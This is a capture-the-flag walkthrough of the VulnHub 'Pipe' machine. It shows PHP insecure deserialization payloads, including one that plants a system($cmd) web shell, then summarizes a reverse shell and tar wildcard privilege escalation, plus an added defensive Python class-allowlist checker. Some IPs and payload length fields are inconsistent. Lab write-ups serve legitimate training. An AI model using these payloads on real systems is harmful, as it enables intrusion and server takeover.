Pipe VulnHub CTF Walkthrough (Insecure Deserialization in PHP)

Asfiya $ha!kh
5 min read, May 1, 2019

Hello Pentester, in this blog we will try to solve the Pipe CTF challenge. Pipe is a vulnerable machine posted on VulnHub; it can be found here: https://www.vulnhub.com/entry/devrandom-pipe,124/

Steps for cracking CTF challenge

Set up the VulnHub machine and run a quick arp-scan to find the IP address of the Pipe VM.

The IP address we need is 10.104.30.128; let's start enumeration.

Run a quick nmap scan as shown.

The nmap scan shows that the VM has three open ports: 80, 22 and 111.

We open our browser to check 192.168.28.131:80, but we need to provide credentials to proceed. Generic attempts such as admin:admin and admin:password failed. We then used Burp Suite to see if we could find out something.

The request intercepted by Burp is as shown.

Let's play around with the request. Before forwarding it to the server, we changed the HTTP method from GET to GETS, and we were able to see the page shown below.

A GET request prompted us for authentication, but this one did not.

Let's use DirBuster; here we found an interesting directory, scriptz/.

The scriptz directory has some files. The file php.js is a JavaScript equivalent of PHP's serialize function. We also saw a log.php.BAK file, which seems to be a logger file.

Checking the source code of the web page, we found that scriptz/php.js is included there.

php.js

log.php.BAK

It seems that this logger file will write to the webroot. This is interesting to us, especially if we can manipulate the `data` field submitted to the file.

Now let's go back to the index page, where we found a hyperlink at the bottom of the page that fetches some artist information. This can also be checked in the page source code.

The page source discloses that the page includes the php.js file to call the serialize API and passes some arguments to it.

We now intercept the request for the artist information in Burp.

The param field is dynamic. Let's send its content to Burp's Decoder tab (right-click and choose Send to Decoder). In the Decoder tab we used Smart Decode to decode the param.

It seems that an `Info` object is being created. We know that a `Log` object will invoke the logger file and allow us to write to the webroot. Let's try to tweak the request so that we can write some data to the webroot via a Log object.

We included a basic phpinfo() PHP script, as shown in the payload below.

O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/scriptz/me.php";s:4:"data";s:19:"<?php phpinfo(); ?>";}

We URL-encode the payload and then forward the request to the server. Here is our modified request.

We saw the phpinfo() output in the browser, so the command was executed.
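As an added example (not code from the original post or from the Pipe VM), here is the check a defender would want in front of unserialize(): a small Python parser for the PHP serialize format that reports which classes a submitted param would instantiate, so a request carrying a Log object where only Info is expected can be rejected, or flagged when reviewing access logs. The Info object and its field names are constructed; the Log blob is the first payload above.

```python
import urllib.parse
# Constructed sample of the artist request with the expected Info object (field
# names assumed) and the walkthrough's first Log payload, both URL-encoded.
INFO_PARAM = urllib.parse.quote('O:4:"Info":1:{s:6:"artist";s:5:"Bowie";}')
LOG_PARAM = urllib.parse.quote('O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/'
                               'scriptz/me.php";s:4:"data";s:19:"<?php phpinfo(); ?>";}')

# Parse a subset of PHP's serialize() format (N, i, b, d, s, a, O). Returns
# (value, next_offset); objects come back as ("object", class, fields) and each
# class name met is appended to `classes`, i.e. what unserialize() would build.
# String lengths are character counts, equal to PHP's byte counts for ASCII.
def parse_php(buf, pos, classes):
    kind = buf[pos]
    if kind == "N":                                  # N;
        return None, pos + 2
    if kind in "ibd":                                # i:42;  b:1;  d:1.5;
        end = buf.index(";", pos)
        conv = {"i": int, "d": float, "b": lambda v: v == "1"}[kind]
        return conv(buf[pos + 2:end]), end + 1
    if kind == "s":                                  # s:3:"abc";
        colon = buf.index(":", pos + 2)
        length, start = int(buf[pos + 2:colon]), colon + 2
        if buf[start + length:start + length + 2] != '";':
            raise ValueError(f"string length mismatch at offset {pos}")
        return buf[start:start + length], start + length + 2
    if kind == "a":                                  # a:2:{key;value;...}
        colon = buf.index(":", pos + 2)
        count, cls, pos = int(buf[pos + 2:colon]), None, colon + 2
    elif kind == "O":                                # O:3:"Log":2:{...}
        colon = buf.index(":", pos + 2)
        name_len = int(buf[pos + 2:colon])
        cls, pos = buf[colon + 2:colon + 2 + name_len], colon + name_len + 4
        classes.append(cls)
        colon = buf.index(":", pos)
        count, pos = int(buf[pos:colon]), colon + 2
    else:
        raise ValueError(f"unsupported type {kind!r} at offset {pos}")
    items = {}
    for _ in range(count):
        key, pos = parse_php(buf, pos, classes)
        items[key], pos = parse_php(buf, pos, classes)
    if buf[pos] != "}":
        raise ValueError(f"expected '}}' at offset {pos}")
    return (("object", cls, items) if cls is not None else items), pos + 1

# Allowlist check before unserialize() (or a log-review rule) on the raw param.
def unexpected_classes(url_encoded_param, allowed):
    blob, classes = urllib.parse.unquote(url_encoded_param), []
    if parse_php(blob, 0, classes)[1] != len(blob):
        raise ValueError("trailing data after serialized value")
    return [c for c in classes if c not in allowed]
```

In PHP itself the equivalent guard is the allowed_classes option of unserialize(), or better, not calling unserialize() on user input at all and using JSON instead.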

Since we can run arbitrary PHP code, we can try to get a reverse shell to our attacking machine. For this we created another file in the webroot.

Payload:

O:3:"Log":2:{s:8:"filename";s:29:"/var/www/html/scriptz/shell.php";s:4:"data";s:41:"<?php%20$cmd%3d$_GET['cmd'];%20system($cmd);%20?>";}

As can be seen, the backdoor is created after encoding and forwarding the above payload in the request, using the same technique shown above for the phpinfo() command.

Let’s start a netcat listener on our Kali machine.

Access the shell.php file, passing the command in the cmd URL parameter; as shown, the id command is executed.

Let's catch the reverse shell on our listening netcat port.

And boom... we have got a local shell.

Let's try privilege escalation now.

Spawn a TTY shell with the command below.

Let's enumerate further for privesc.

Checking /etc/crontab exposed the script /usr/bin/compress.sh, which was world-readable.

The backup script uses a * wildcard to back up all files in the directory /home/rene/backup/.

Due to improperly configured file system permissions on this backup directory, it is possible to create files in the backup directory which tar will process when it backs up the files in the directory.

Tar's --checkpoint-action parameter can be abused to execute arbitrary commands as the user running the tar binary.

And here is the root shell.

